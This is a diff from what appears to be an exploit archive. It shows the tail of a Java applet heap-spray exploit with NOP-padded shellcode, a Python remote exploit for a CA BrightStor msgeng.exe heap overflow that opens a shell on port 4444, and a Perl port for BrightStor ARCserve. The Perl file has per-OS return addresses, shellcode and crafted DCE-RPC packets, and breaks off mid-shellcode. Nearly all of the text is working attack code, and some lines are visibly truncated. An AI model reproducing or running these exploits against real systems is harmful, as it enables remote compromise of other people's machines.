+		(byte)0x08, (byte)0x11, (byte)0xd8, (byte)0x0c, (byte)0x54, (byte)0xe0, (byte)0x77, (byte)0x8f, (byte)0xfd, (byte)0x3d, (byte)0x82, (byte)0x8b, (byte)0x59, (byte)0xe7, (byte)0xe1, (byte)0x66,
+		(byte)0xe0, (byte)0x43, (byte)0xae, (byte)0x36, (byte)0x70, (byte)0xaa, (byte)0x2c, (byte)0xbd, (byte)0xbb, (byte)0x10, (byte)0xb0, (byte)0x59, (byte)0x83, (byte)0x0c, (byte)0xb6, (byte)0x06,
+		(byte)0xa1, (byte)0x5c, (byte)0x25, (byte)0xac, (byte)0xbc, (byte)0x11, (byte)0xf0, (byte)0xd4, (byte)0xc5, (byte)0xc9, (byte)0x0d, (byte)0x97, (byte)0x6c, (byte)0xe5, (byte)0x8a, (byte)0x5d,
+		(byte)0x53, (byte)0xba, (byte)0x01, (byte)0x1b, (byte)0x98, (byte)0xd0, (byte)0x6b, (byte)0x5f, (byte)0x7f, (byte)0xa0, (byte)0x0b, (byte)0xb3, (byte)0xd5, (byte)0xd6, (byte)0xa9, (byte)0x08,
+		(byte)0xc0, (byte)0xae, (byte)0x3c, (byte)0x90, (byte)0x88, (byte)0xe5, (byte)0x23, (byte)0xc7, (byte)0x0a, (byte)0x33, (byte)0xa7, (byte)0xd0, (byte)0x86, (byte)0xd0, (byte)0x6c, (byte)0x0d,
+		(byte)0x61, (byte)0x11, (byte)0x7a, (byte)0xd6, (byte)0x88, (byte)0x2a, (byte)0xd0, (byte)0xf2, (byte)0x44, (byte)0xeb, (byte)0x1c, (byte)0x02, (byte)0x32, (byte)0xe0, (byte)0xc1, (byte)0x79,
+		(byte)0xa8, (byte)0xb3, (byte)0x35, (byte)0x6f, (byte)0x11, (byte)0x8a, (byte)0x00, (byte)0x47, (byte)0x70, (byte)0xcf, (byte)0xc8, (byte)0x09, (byte)0xf1, (byte)0xb6, (byte)0x1e, (byte)0xb4,
+		(byte)0xc1, (byte)0x0e, (byte)0x3e, (byte)0xa7, (byte)0x03, (byte)0x07, (byte)0xe8, (byte)0x30, (byte)0xb7, (byte)0x34, (byte)0x44, (byte)0xe8, (byte)0x08, (byte)0x16, (byte)0x9f, (byte)0xfa,
+		(byte)0x2f, (byte)0x96, (byte)0x50, (byte)0x00, (byte)0x19, (byte)0x98, (byte)0xac, (byte)0x56, (byte)0x0f, (byte)0x13, (byte)0xef, (byte)0x18, (byte)0xfc, (byte)0x0b, (byte)0xf6, (byte)0x3d,
+		(byte)0x5f, (byte)0xfc, (byte)0x07, (byte)0xc6, (byte)0x9a, (byte)0x02, (byte)0x90, (byte)0x82, (byte)0xb4, (byte)0x30, (byte)0x9b, (byte)0xf3, (byte)0x41, (byte)0x46, (byte)0xe0, (byte)0x42,
+		(byte)0xd1, (byte)0xd4, (byte)0x09, (byte)0x61, (byte)0x01, (byte)0x5a, (byte)0xd1, (byte)0x01, (byte)0x4e, (byte)0x17, (byte)0x58, (byte)0xd9, (byte)0x17, (byte)0xf8, (byte)0xd0, (byte)0x31,
+		(byte)0xff, (byte)0x21, (byte)0x24, (byte)0x7b, (byte)0xef, (byte)0x48, (byte)0x7c, (byte)0x13, (byte)0xd6, (byte)0x7d, (byte)0x80, (byte)0x03, (byte)0x0e, (byte)0xa4, (byte)0x81, (byte)0x0e,
+		(byte)0x66, (byte)0x42, (byte)0x41, (byte)0x1a, (byte)0xbe, (byte)0x20, (byte)0x04, (byte)0x44, (byte)0x22, (byte)0x5e, (byte)0x10, (byte)0x7b, (byte)0x50, (byte)0xc2, (byte)0x14, (byte)0x9c,
+		(byte)0x84, (byte)0x83, (byte)0x20, (byte)0x31, (byte)0xc8, (byte)0x4c, (byte)0x63, (byte)0xa0, (byte)0x03, (byte)0x18, (byte)0x16, (byte)0xc0, (byte)0x8e, (byte)0xcb, (byte)0x07, (byte)0xa0,
+		(byte)0x08, (byte)0x4a, (byte)0x60, (byte)0x3c, (byte)0xd6, (byte)0x3b, (byte)0x0f, (byte)0x22, (byte)0x67, (byte)0x41, (byte)0x8c, (byte)0xf4, (byte)0x6a, (byte)0x1e, (byte)0xf9, (byte)0x80,
+		(byte)0xe6, (byte)0x30, (byte)0x83, (byte)0x19, (byte)0xf4, (byte)0x1c, (byte)0x07, (byte)0x38, (byte)0xe0, (byte)0x50, (byte)0x83, (byte)0x34, (byte)0x35, (byte)0x37, (byte)0x21, (byte)0xe0,
+		(byte)0xe5, (byte)0xf2, (byte)0x0c, (byte)0x48, (byte)0x42, (byte)0xe7, (byte)0xa5, (byte)0x83, (byte)0xf5, (byte)0x20, (byte)0xed, (byte)0xea, (byte)0x08, (byte)0x37, (byte)0x18, (byte)0x83,
+		(byte)0x19, (byte)0x44, (byte)0x7e, (byte)0x79, (byte)0x3d, (byte)0xec, (byte)0x01, (byte)0x07, (byte)0xb5, (byte)0xbf, (byte)0x3d, (byte)0x07, (byte)0xb6, (byte)0xf6, (byte)0xf7, (byte)0x34,
+		(byte)0x18, (byte)0x60, (byte)0x0d, (byte)0xf3, (byte)0xda, (byte)0x3b, (byte)0x03, (byte)0x42, (byte)0xb0, (byte)0x82, (byte)0x0e, (byte)0xd8, (byte)0xa1, (byte)0x0d, (byte)0xb9, (byte)0x0f,
+		(byte)0xcd, (byte)0xc6, (byte)0x7c, (byte)0xb0, (byte)0x32, (byte)0x21, (byte)0xc0, (byte)0xcc, (byte)0xf4, (byte)0xc1, (byte)0xef, (byte)0x40, (byte)0x82, (byte)0x72, (byte)0x3f, (byte)0x85,
+		(byte)0xba, (byte)0x59, (byte)0x67, (byte)0x41, (byte)0x17, (byte)0x50, (byte)0xc2, (byte)0x8b, (byte)0x4d, (byte)0xff, (byte)0xfc, (byte)0x15, (byte)0xd8, (byte)0x1e, (byte)0x02, (byte)0x6d,
+		(byte)0x60, (byte)0xd0, (byte)0xfb, (byte)0x89, (byte)0xc3, (byte)0x04, (byte)0x2c, (byte)0x28, (byte)0x1c, (byte)0xd3, (byte)0x7b, (byte)0x30, (byte)0x03, (byte)0xf6, (byte)0x87, (byte)0x7f,
+		(byte)0xa1, (byte)0x41, (byte)0x1b, (byte)0x0f, (byte)0x27, (byte)0x04, (byte)0xd9, (byte)0x87, (byte)0x78, (byte)0xb4, (byte)0x67, (byte)0x7b, (byte)0x6d, (byte)0xd0, (byte)0x06, (byte)0x3d,
+		(byte)0x30, (byte)0x05, (byte)0x3f, (byte)0x57, (byte)0x1b, (byte)0x0b, (byte)0x60, (byte)0x36, (byte)0x1c, (byte)0xb5, (byte)0x77, (byte)0x27, (byte)0xc0, (byte)0x21, (byte)0x76, (byte)0xa0,
+		(byte)0x20, (byte)0xe8, (byte)0x91, (byte)0x2d, (byte)0x32, (byte)0xc0, (byte)0x05, (byte)0x36, (byte)0xa0, (byte)0x18, (byte)0xa6, (byte)0x87, (byte)0x7a, (byte)0x6d, (byte)0x30, (byte)0x03,
+		(byte)0x53, (byte)0xc0, (byte)0x03, (byte)0x53, (byte)0xf0, (byte)0x70, (byte)0x37, (byte)0x73, (byte)0x04, (byte)0x05, (byte)0xe0, (byte)0x2a, (byte)0xff, (byte)0xa7, (byte)0x65, (byte)0xed,
+		(byte)0xd0, (byte)0x05, (byte)0x4a, (byte)0xd0, (byte)0x73, (byte)0xc8, (byte)0x02, (byte)0x17, (byte)0xb6, (byte)0x21, (byte)0x03, (byte)0x42, (byte)0xd0, (byte)0x03, (byte)0x18, (byte)0x94,
+		(byte)0xff, (byte)0x17, (byte)0x97, (byte)0xf7, (byte)0x01, (byte)0x36, (byte)0x30, (byte)0x01, (byte)0x25, (byte)0x13, (byte)0x4b, (byte)0x35, (byte)0x78, (byte)0x1c, (byte)0x6d, (byte)0x50,
+		(byte)0x45, (byte)0xa6, (byte)0x37, (byte)0x08, (byte)0x51, (byte)0xc0, (byte)0x04, (byte)0x42, (byte)0x00, (byte)0x01, (byte)0xcd, (byte)0x14, (byte)0x84, (byte)0x1a, (byte)0x57, (byte)0x00,
+		(byte)0x96, (byte)0xd7, (byte)0x82, (byte)0x7c, (byte)0x56, (byte)0x02, (byte)0x24, (byte)0x20, (byte)0x04, (byte)0x53, (byte)0x30, (byte)0x5b, (byte)0xb7, (byte)0x11, (byte)0x18, (byte)0x3c,
+		(byte)0x90, (byte)0x04, (byte)0xb2, (byte)0xb0, (byte)0x45, (byte)0xda, (byte)0x07, (byte)0x1f, (byte)0x3e, (byte)0x12, (byte)0x07, (byte)0x1a, (byte)0x77, (byte)0x85, (byte)0x6b, (byte)0xa0,
+		(byte)0x03, (byte)0xa7, (byte)0xd5, (byte)0x0a, (byte)0x0c, (byte)0xa6, (byte)0x6c, (byte)0x73, (byte)0x24, (byte)0x61, (byte)0x7d, (byte)0x70, (byte)0x2c, (byte)0x7d, (byte)0x80, (byte)0x1c,
+		(byte)0x6b, (byte)0x60, (byte)0x01, (byte)0x03, (byte)0x02, (byte)0x1f, (byte)0x7b, (byte)0x87, (byte)0x16, (byte)0x20, (byte)0x30, (byte)0x04, (byte)0x37, (byte)0xd8, (byte)0x07, (byte)0x6d,
+		(byte)0xf8, (byte)0x12, (byte)0x3c, (byte)0x40, (byte)0x3a, (byte)0xd2, (byte)0x50, (byte)0x35, (byte)0xa6, (byte)0x57, (byte)0x0e, (byte)0x15, (byte)0x00, (byte)0x86, (byte)0x43, (byte)0xf0,
+		(byte)0x12, (byte)0x2f, (byte)0x41, (byte)0x86, (byte)0xf0, (byte)0x11, (byte)0x87, (byte)0xa6, (byte)0x57, (byte)0x02, (byte)0x3a, (byte)0x90, (byte)0x0e, (byte)0x6b, (byte)0xe0, (byte)0x14,
+		(byte)0x45, (byte)0xb1, (byte)0x07, (byte)0x96, (byte)0x17, (byte)0x00, (byte)0xcb, (byte)0x50, (byte)0x84, (byte)0x01, (byte)0xe0, (byte)0x13, (byte)0x21, (byte)0x25, (byte)0x02, (byte)0x64,
+		(byte)0x60, (byte)0x19, (byte)0x3a, (byte)0xd0, (byte)0x05, (byte)0xde, (byte)0xf1, (byte)0x53, (byte)0x97, (byte)0xb7, (byte)0x04, (byte)0x77, (byte)0x10, (byte)0x52, (byte)0x83, (byte)0x08,
+		(byte)0x05, (byte)0x42, (byte)0x00, (byte)0x89, (byte)0xbc, (byte)0xc1, (byte)0x1a, (byte)0x50, (byte)0x88, (byte)0x69, (byte)0x12, (byte)0xc6, (byte)0x02, (byte)0x6d, (byte)0x08, (byte)0x05,
+		(byte)0x4a, (byte)0xe0, (byte)0x0b, (byte)0x59, (byte)0xa1, (byte)0x13, (byte)0x94, (byte)0x18, (byte)0x00, (byte)0x36, (byte)0xe0, (byte)0x16, (byte)0x6b, (byte)0x40, (byte)0x06, (byte)0xe6,
+		(byte)0xf7, (byte)0x7b, (byte)0xb3, (byte)0x58, (byte)0x08, (byte)0xbc, (byte)0xa0, (byte)0x04, (byte)0x64, (byte)0xd0, (byte)0x07, (byte)0x4a, (byte)0xc0, (byte)0x63, (byte)0xbb, (byte)0x58,
+		(byte)0x08, (byte)0x0c, (byte)0x30, (byte)0x07, (byte)0x15, (byte)0xa0, (byte)0x0d, (byte)0x7b, (byte)0xb0, (byte)0x04, (byte)0xcc, (byte)0x80, (byte)0x88, (byte)0xc3, (byte)0x18, (byte)0x05,
+		(byte)0x24, (byte)0x70, (byte)0x07, (byte)0x2a, (byte)0x80, (byte)0x05, (byte)0xc3, (byte)0x88, (byte)0x08, (byte)0x8d, (byte)0x24, (byte)0x00, (byte)0x36, (byte)0x50, (byte)0x02, (byte)0xa9,
+		(byte)0x78, (byte)0x71, (byte)0xf7, (byte)0x35, (byte)0x8d, (byte)0xdc, (byte)0x68, (byte)0x39, (byte)0x18, (byte)0x57, (byte)0x74, (byte)0x88, (byte)0xc7, (byte)0x8c, (byte)0xcc, (byte)0xd8,
+		(byte)0x09, (byte)0x8d, (byte)0x3f, (byte)0x74, (byte)0x86, (byte)0xe4, (byte)0x28, (byte)0x1f, (byte)0x81, (byte)0x00, (byte)0x00, (byte)0x3b
+	};
+	byte[] shellcode = new byte[]
+	{
+		(byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90,
+		// shellcode copied from metasploit to run calc.exe
+		(byte)0x29, (byte)0xc9, (byte)0x83, (byte)0xe9, (byte)0xde, (byte)0xd9, (byte)0xee, (byte)0xd9, (byte)0x74, (byte)0x24, (byte)0xf4, (byte)0x5b, (byte)0x81, (byte)0x73, (byte)0x13, (byte)0x38,
+		(byte)0x09, (byte)0x13, (byte)0x8e, (byte)0x83, (byte)0xeb, (byte)0xfc, (byte)0xe2, (byte)0xf4, (byte)0xc4, (byte)0xe1, (byte)0x57, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xcb,
+		(byte)0x04, (byte)0x82, (byte)0x6f, (byte)0x8b, (byte)0x40, (byte)0x08, (byte)0xfc, (byte)0x05, (byte)0x77, (byte)0x11, (byte)0x98, (byte)0xd1, (byte)0x18, (byte)0x08, (byte)0xf8, (byte)0xc7,
+		(byte)0xb3, (byte)0x3d, (byte)0x98, (byte)0x8f, (byte)0xd6, (byte)0x38, (byte)0xd3, (byte)0x17, (byte)0x94, (byte)0x8d, (byte)0xd3, (byte)0xfa, (byte)0x3f, (byte)0xc8, (byte)0xd9, (byte)0x83,
+		(byte)0x39, (byte)0xcb, (byte)0xf8, (byte)0x7a, (byte)0x03, (byte)0x5d, (byte)0x37, (byte)0x8a, (byte)0x4d, (byte)0xec, (byte)0x98, (byte)0xd1, (byte)0x1c, (byte)0x08, (byte)0xf8, (byte)0xe8,
+		(byte)0xb3, (byte)0x05, (byte)0x58, (byte)0x05, (byte)0x67, (byte)0x15, (byte)0x12, (byte)0x65, (byte)0xb3, (byte)0x15, (byte)0x98, (byte)0x8f, (byte)0xd3, (byte)0x80, (byte)0x4f, (byte)0xaa,
+		(byte)0x3c, (byte)0xca, (byte)0x22, (byte)0x4e, (byte)0x5c, (byte)0x82, (byte)0x53, (byte)0xbe, (byte)0xbd, (byte)0xc9, (byte)0x6b, (byte)0x82, (byte)0xb3, (byte)0x49, (byte)0x1f, (byte)0x05,
+		(byte)0x48, (byte)0x15, (byte)0xbe, (byte)0x05, (byte)0x50, (byte)0x01, (byte)0xf8, (byte)0x87, (byte)0xb3, (byte)0x89, (byte)0xa3, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xe6,
+		(byte)0x04, (byte)0x56, (byte)0x22, (byte)0x78, (byte)0x58, (byte)0x5f, (byte)0x9a, (byte)0x76, (byte)0xbb, (byte)0xc9, (byte)0x68, (byte)0xde, (byte)0x50, (byte)0xf9, (byte)0x99, (byte)0x8a,
+		(byte)0x67, (byte)0x61, (byte)0x8b, (byte)0x70, (byte)0xb2, (byte)0x07, (byte)0x44, (byte)0x71, (byte)0xdf, (byte)0x6a, (byte)0x72, (byte)0xe2, (byte)0x5b, (byte)0x09, (byte)0x13, (byte)0x8e
+	};
+
+	public void init() {
+		image = Toolkit.getDefaultToolkit().createImage(imageBytes);
+	}
+
+	public void paint(Graphics g) {
+		int heapBlockSize = 0x5000000;
+		int heapSlidSize = 0x100000;
+		byte[] buffer = new byte[heapBlockSize];
+		byte heapFilling = (byte)0x24;
+
+		for (int i = 0; i < buffer.length; i ++) {
+			buffer[i] = heapFilling;
+		}
+
+		for (int i = 1; i < 0x50; i ++) {
+			for (int j = 0; j < shellcode.length; j ++) {
+				buffer[i * heapSlidSize - shellcode.length - 0x1000 + j] = shellcode[j];
+			}
+		}
+
+		if (image != null) {
+			g.drawImage(image, 0, 0, this);
+		}
+	}
+}
+
+// milw0rm.com [2007-01-21]
diff --git a/platforms/windows/remote/3211.py b/platforms/windows/remote/3211.py
index e1dba7205..5d04c4e75 100755
--- a/platforms/windows/remote/3211.py
+++ b/platforms/windows/remote/3211.py
@@ -1,69 +1,69 @@
-#!/usr/bin/python
-# I couldnt find a reliable exploit for my analysis and so came up with this.
-# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
-# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
-# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
-# to port to other platforms. The exploit overwrites the
-# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
-# address of call dword ptr [esi +4C] located in user32.dll. At the time when
-# UEF is called esi +4C contains a pointer to our shellcode.
-#
-# Winny M Thomas ;-)
-# Author shall bear no responsibility for any screw ups caused by using this code
-
-from impacket.dcerpc import transport, dcerpc
-from impacket import uuid
-import struct
-import sys
-
-def DCEconnectAndExploit(target):
-       trans = transport.TCPTransport(target, 6503)
-       trans.connect()
-       dce = dcerpc.DCERPC_v5(trans)
-       dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
-
-       request = "A" * 676
-       request += "\x90\x90\x90\x90"
-       request += "\x90\x90\xeb\x0a"
-
-       #Call dword ptr [esi +4C] from user32.dll
-       request += struct.pack("\n' % sys.argv[0]
-               sys.exit(-1)
-
-       DCEconnectAndExploit(target)
-
-# milw0rm.com [2007-01-27]
+#!/usr/bin/python
+# I couldnt find a reliable exploit for my analysis and so came up with this.
+# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
+# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
+# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
+# to port to other platforms. The exploit overwrites the
+# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
+# address of call dword ptr [esi +4C] located in user32.dll. At the time when
+# UEF is called esi +4C contains a pointer to our shellcode.
+#
+# Winny M Thomas ;-)
+# Author shall bear no responsibility for any screw ups caused by using this code
+
+from impacket.dcerpc import transport, dcerpc
+from impacket import uuid
+import struct
+import sys
+
+def DCEconnectAndExploit(target):
+       trans = transport.TCPTransport(target, 6503)
+       trans.connect()
+       dce = dcerpc.DCERPC_v5(trans)
+       dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
+
+       request = "A" * 676
+       request += "\x90\x90\x90\x90"
+       request += "\x90\x90\xeb\x0a"
+
+       #Call dword ptr [esi +4C] from user32.dll
+       request += struct.pack("\n' % sys.argv[0]
+               sys.exit(-1)
+
+       DCEconnectAndExploit(target)
+
+# milw0rm.com [2007-01-27]
diff --git a/platforms/windows/remote/3218.pl b/platforms/windows/remote/3218.pl
index ad50db9d2..c0b6b5a57 100755
--- a/platforms/windows/remote/3218.pl
+++ b/platforms/windows/remote/3218.pl
@@ -1,144 +1,144 @@
-#!/usr/bin/perl
-# 
-# original exploit by lssec.com this is a perl porting
-# 
-# acaro [at] jervus.it
-
-
-use IO::Socket::INET;
-use Switch;
-
-if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress\n";
-print " Return address: \n";
-print " 1 - Windows 2k Sp4 English Version\n";
-print " 2 - Windows 2k Sp4 Italian Version\n";
-print " 3 - Windows XP Pro Sp1 English Version\n";
-print " 4 - Windows XP Pro Sp0 English Version\n";
-print " If values not specified, Windows 2k Sp4 will be used.\n";
-print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1 -o1\n";
-print "--------------------------------------------------------------------\n";
-}
-
-use IO::Socket::INET;
-
-my $host = 10.0.0.2;
-my $port = 6503;
-my $reply;
-my $request;
-my $jmp="\xeb\x0a\x90\x90";	# JMP over ret and uef to our shellcode
-
-
-
-
-foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
-$uef = $1 if ($_=~/-o(.*)/);
-$ret = $1 if ($_=~/-o(.*)/);
-}
-
-
-
-
-switch ($uef) {
-case 1 { $uef="\x4c\x14\x54\x7c" } # Win2k SP4 English version
-case 2 { $uef="\x4c\x14\x68\x79" } # Win2k SP4 Italian  version
-case 3 { $uef="\xb4\x73\xed\x77" } # WinXP Pro English SP1 version
-case 4 { $uef="\xb4\x63\xed\x77" } # WinXP Pro English SP0 version
-}
-
-switch ($ret) {
-case 1 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll
-case 2 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 Italian  version CALL DWORD PTR DS:[ESI+48] in qclient.dll
-case 3 { $ret="\x52\xbf\x04\x78" } # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
-case 4 { $ret="\xd7\xe9\xd0\x77" } # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
-}
-
-
-
-
-my $shellcode  =
-"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0".
-"\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f".
-"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf".
-"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbA\xbb\xbc\xbd\xbe\xbf".
-"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf".
-"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf".
-"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef".
-"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff".
-"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa".
-"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28".
-"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79".
-"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb".
-"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42".
-"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63".
-"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d".
-"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a".
-"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07".
-"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5".
-"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b".
-"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa".
-"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75".
-"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";
-
-
-my $uuid="\x05".							#version
-"\x00".									#version minor
-"\x0b".									#packet bind
-"\x03".									#packet flag
-"\x10\x00\x00\x00".							#data rapresentation
-"\x48\x00".								#fragment length
-"\x00\x00".								#auth length
-"\x01\x00\x00\x00".							#call id
-"\xd0\x16\xd0\x16".				
-"\x00\x00\x00\x00".							#assoc group			
-"\x01\x00\x00\x00\x00\x00\x01\x00".					
-"\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38".	#uuid
-"\x01\x00".								#interface ver
-"\x00\x00".								#interface ver minor
-"\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60".	#transfer syntax
-"\x02\x00\x00\x00";							#syntax ver
-
-my $special="\x05".							#version
-"\x00".									#version minor
-"\x00".									#packet type request
-"\x03".									#packet flags
-"\x10\x00\x00\x00".							#data rapresentation
-"\x18\x08".								#frag length
-"\x00\x00".								#auth length
-"\x01\x00\x00\x00".							#call id
-"\x00\x08\x00\x00".							#alloc hint
-"\x00\x00".								#contex id
-"\x2b\x00";								#opnum 43
-
-
-
-
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
-
-
-$request = $uuid;
-send $socket, $request, 0;
-print "[+] Sent uuid request\n";
-recv($socket, $reply, 1024, 0);
-
-
-$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
-send $socket, $request, 0;
-print "[+] Sent malicius 1st request\n";
-
-
-$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
-send $socket, $request, 0;
-print "[+] Sent malicius 2nd request\n";
-
-
-
-print " + Connect on 4444 port of $host ...\n";
-sleep(3);
-system("telnet $host 4444");
-exit;
-
-# milw0rm.com [2007-01-28]
+#!/usr/bin/perl
+# 
+# original exploit by lssec.com this is a perl porting
+# 
+# acaro [at] jervus.it
+
+
+use IO::Socket::INET;
+use Switch;
+
+if (@ARGV < 3) {
+print "--------------------------------------------------------------------\n";
+print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress\n";
+print " Return address: \n";
+print " 1 - Windows 2k Sp4 English Version\n";
+print " 2 - Windows 2k Sp4 Italian Version\n";
+print " 3 - Windows XP Pro Sp1 English Version\n";
+print " 4 - Windows XP Pro Sp0 English Version\n";
+print " If values not specified, Windows 2k Sp4 will be used.\n";
+print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1 -o1\n";
+print "--------------------------------------------------------------------\n";
+}
+
+use IO::Socket::INET;
+
+my $host = 10.0.0.2;
+my $port = 6503;
+my $reply;
+my $request;
+my $jmp="\xeb\x0a\x90\x90";	# JMP over ret and uef to our shellcode
+
+
+
+
+foreach (@ARGV) {
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$uef = $1 if ($_=~/-o(.*)/);
+$ret = $1 if ($_=~/-o(.*)/);
+}
+
+
+
+
+switch ($uef) {
+case 1 { $uef="\x4c\x14\x54\x7c" } # Win2k SP4 English version
+case 2 { $uef="\x4c\x14\x68\x79" } # Win2k SP4 Italian  version
+case 3 { $uef="\xb4\x73\xed\x77" } # WinXP Pro English SP1 version
+case 4 { $uef="\xb4\x63\xed\x77" } # WinXP Pro English SP0 version
+}
+
+switch ($ret) {
+case 1 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll
+case 2 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 Italian  version CALL DWORD PTR DS:[ESI+48] in qclient.dll
+case 3 { $ret="\x52\xbf\x04\x78" } # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
+case 4 { $ret="\xd7\xe9\xd0\x77" } # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
+}
+
+
+
+
+my $shellcode  =
+"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0".
+"\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f".
+"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf".
+"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbA\xbb\xbc\xbd\xbe\xbf".
+"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf".
+"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf".
+"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef".
+"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff".
+"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa".
+"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28".
+"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79".
+"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb".
+"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42".
+"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63".
+"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d".
+"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a".
+"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07".
